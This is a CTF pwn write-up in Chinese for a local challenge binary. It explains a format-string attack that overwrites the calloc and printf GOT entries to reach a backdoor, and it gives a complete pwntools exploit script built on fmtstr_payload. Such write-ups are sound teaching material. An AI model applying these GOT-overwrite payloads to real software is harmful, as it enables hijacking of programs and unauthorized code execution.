漏洞点
漏洞点很多:
格式化字符串漏洞
后门
泄露libc函数等
不过值得一提的是 栈溢出是假的(那个函数返回地址由堆的一个东西管理
思路
设定了函数call前RSP为0结尾,直接挟持got表改写后门函数会出现不对其错误
所以我们可以挟持两个函数,分两个函数来打,可以优秀地控制栈帧
这里挟持了一个冷门函数calloc的got表为backdoor的地址
再挟持printf为call calloc的地址即可
栈上的格式化字符串的打法比较简单,这里就不多说了
用好fmtstr_payload可以事半功倍
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
| from pwn import *
from pwncli import gift
import ctypes
context.terminal = ["tmux","splitw","-h"]
context.log_level = "debug"
context.arch = "amd64"
filename = "./pwn"
libc_name = ""
remote_ip = ""
remote_port = ""
mode = 0
s = lambda x: p.send(x)
r = lambda x: p.recv(x)
ra = lambda: p.recvall()
rl = lambda: p.recvline(keepends=True)
ru = lambda x: p.recvuntil(x)
sl = lambda x: p.sendline(x)
sa = lambda x, y: p.sendafter(x, y)
sla = lambda x, y: p.sendlineafter(x, y)
ia = lambda: p.interactive()
c = lambda: p.close()
if mode:
p = remote(remote_ip, remote_port)
else:
p = process(filename)
def bpp():
gdb.attach(p)
pause()
def log(x):
print("\x1B[36m{}\x1B[0m".format(x))
def leak():
leak_dat = ru("\x7f")[-6:]
return u64(leak_dat.ljust(8, b'\x00'))
prefix = "choose:"
def Repeater(payload):
sla(prefix, str(4294967293))
sa("You find a Repeater!", payload + b'\x00')
def chance(payload):
sla(prefix, str(1))
s(payload)
def gift():
sla(prefix, str(10086))
ru("Everyone is tired and reduces the workload!")
gift()
rl()
puts_got = int(rl().decode()[:-1], 16)
log(hex(puts_got))
offset = 6
ret_addr = 0x401522
backdoor = 0x401514
elf = ELF("./pwn")
pad = fmtstr_payload(offset, {elf.got['calloc']: backdoor})
Repeater(pad)
pad = fmtstr_payload(offset, {elf.got['printf']: 0x40153D})
bpp()
Repeater(pad)
ia()
|